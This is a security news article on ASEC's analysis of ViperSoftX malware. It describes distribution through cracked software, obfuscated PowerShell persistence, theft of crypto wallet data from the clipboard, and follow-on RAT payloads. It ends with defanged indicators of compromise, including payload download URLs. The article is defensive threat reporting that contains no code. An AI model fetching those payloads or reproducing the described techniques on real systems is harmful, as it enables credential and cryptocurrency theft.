AhnLab Security Intelligence Center (ASEC) has identified persistent and sophisticated campaigns involving the ViperSoftX malware, originating from threat actors aggressively targeting users in South Korea and other regions.
The campaigns leverage ViperSoftX’s modular architecture to infiltrate systems, execute remote commands, and facilitate the theft of sensitive credentials, particularly those linked to cryptocurrency wallets.
ViperSoftX’s distribution methods, persistence mechanisms, and extensive use of PowerShell scripts present significant challenges for traditional defense systems.
ViperSoftX first emerged in 2020, frequently distributed under the guise of cracked software and key generators. Infections later expanded into distribution via malicious eBooks on torrent platforms, broadening its victim base.
The tactic of using illegal software as an initial infection vector remains core to the malware’s spread, impacting users globally regardless of nationality whenever they download unauthorized executables from untrusted sources.
Technical Attack Flow
Upon execution, ViperSoftX deploys multiple obfuscated PowerShell scripts to establish persistence and retrieve additional payloads.
The malware registers scheduled tasks using sophisticated methods, such as embedding malicious scripts in disguised log files or storing encoded downloader commands within Windows Registry entries.
According to ASEC Report, these techniques allow the malware to evade detection while maintaining redundancy in its persistence.
The PowerShell scripts serve as downloaders, either fetching malicious payloads directly from URLs or using advanced techniques like DNS TXT record queries to receive encrypted instructions and secondary payloads.
Data exfiltration and command-and-control (C2) communication are implemented through customized HTTP headers, with the “X-User-Agent” field transmitting detailed host information (such as system version, user credentials, GUID, AV status, and more).
A core capability of ViperSoftX lies in harvesting and exfiltrating sensitive data. The malware closely monitors Windows clipboard activity and window titles to detect cryptocurrency wallet software.
It surveils clipboard data for wallet addresses or BIP39 recovery phrases, immediately transmitting any matches to C2 servers.
These operations target a wide spectrum of crypto wallet formats including BTC, ETH, XRP, ADA, and several others using regex-based identification.
To eliminate interference from competing clipboard-manipulating malware (ClipBankers), ViperSoftX introduces a “ClipboardProtect.ps1” script, which inspects active processes.
Unsigned processes outside trusted directories are terminated when clipboard access occurs, preventing rival malware from hijacking transaction data.
The malware also collects exhaustive data on installed browser extensions and software, with explicit targeting of Chromium-based and Mozilla browsers such as Chrome, Edge, Opera, Firefox, and more. This telemetry is sent to threat actors for further exploitation or lateral targeting.
Multi-Stage Payload Delivery
ViperSoftX frequently acts as a conduit for additional malware. Notably, it downloads and launches open-source threats like Quasar RAT a remote access trojan with keylogging and credential theft capabilities.
Recent campaigns have also deployed PureCrypter, a .NET-based loader with analysis evasion and process injection features, and PureHVNC, a commercial remote desktop tool.
Furthermore, ViperSoftX can install additional clipboard hijackers (ClipBankers) to further automate the theft of crypto assets by swapping clipboard addresses with attacker-controlled wallets.
Given ViperSoftX’s prevalence and potent data exfiltration risks, users are urged to avoid obtaining software from unofficial sources, apply all relevant OS and software security patches, and maintain up-to-date endpoint protection.
The multi-vector persistence and stealthy PowerShell-based communication of ViperSoftX reinforce the need for advanced endpoint monitoring and behavioral detection.
Indicators of Compromise (IOC)
| Type | Value |
|---|---|
| MD5 Hashes | 064b1e45016e8a49eba01878e41ecc37 0ed2d0579b60d9e923b439d8e74b53e1 0efe1a5d5f4066b7e9755ad89ee9470c 197ff9252dd5273e3e77ee07b37fd4dd 1ec4b69f3194bd647639e6b0fa5c7bb5 |
| URLs | http[:]//136[.]243[.]132[.]112/ut[.]exe http[:]//136[.]243[.]132[.]112[:]881/3[.]exe http[:]//136[.]243[.]132[.]112[:]881/APPDATA[.]exe http[:]//136[.]243[.]132[.]112[:]881/a[.]ps1 http[:]//136[.]243[.]132[.]112[:]881/firefoxtemp[.]exe |
| IP Addresses | 136[.]243[.]132[.]112 160[.]191[.]77[.]89 185[.]245[.]183[.]74 212[.]56[.]35[.]232 89[.]117[.]79[.]31 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update
